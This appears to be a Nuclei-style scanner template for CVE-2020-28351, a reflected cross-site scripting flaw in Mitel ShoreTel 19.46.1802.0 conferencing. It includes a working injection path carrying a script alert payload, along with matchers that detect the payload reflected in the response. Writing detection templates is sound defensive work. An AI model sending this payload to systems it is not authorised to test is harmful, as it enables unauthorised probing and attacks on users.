2021-09-15 06:13:50 +00:00
id : CVE-2020-28351
info :
name : ShoreTel 19.46.1802.0 XSS
author : pikpikcu
severity : medium
description : conferencing component on Mitel ShoreTel 19.46.1802.0 devices could allow an unauthenticated attacker to conduct a reflected cross-site scripting (XSS) attack (via the PATH_INFO to index.php) due to insufficient validation for the time_zone object in the HOME_MEETING& page
reference :
- https://packetstormsecurity.com/files/159987/ShoreTel-Conferencing-19.46.1802.0-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2020-28351
2021-09-21 10:13:08 +00:00
tags : cve,cve2020,shoretel,xss
2021-09-15 12:04:47 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.10
cve-id : CVE-2020-28351
cwe-id : CWE-79
2021-09-15 06:13:50 +00:00
requests :
- method : GET
path :
2021-09-15 11:54:42 +00:00
- "{{BaseURL}}/index.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E?page=HOME"
2021-09-15 06:13:50 +00:00
headers :
Content-Type : application/x-www-form-urlencoded
matchers-condition : and
matchers :
- type : word
words :
2021-09-15 11:54:42 +00:00
- '</script><script>alert(document.domain)</script>'
2021-09-15 06:13:50 +00:00
part : body
- type : word
words :
- 'Content-Type : text/html'
part : header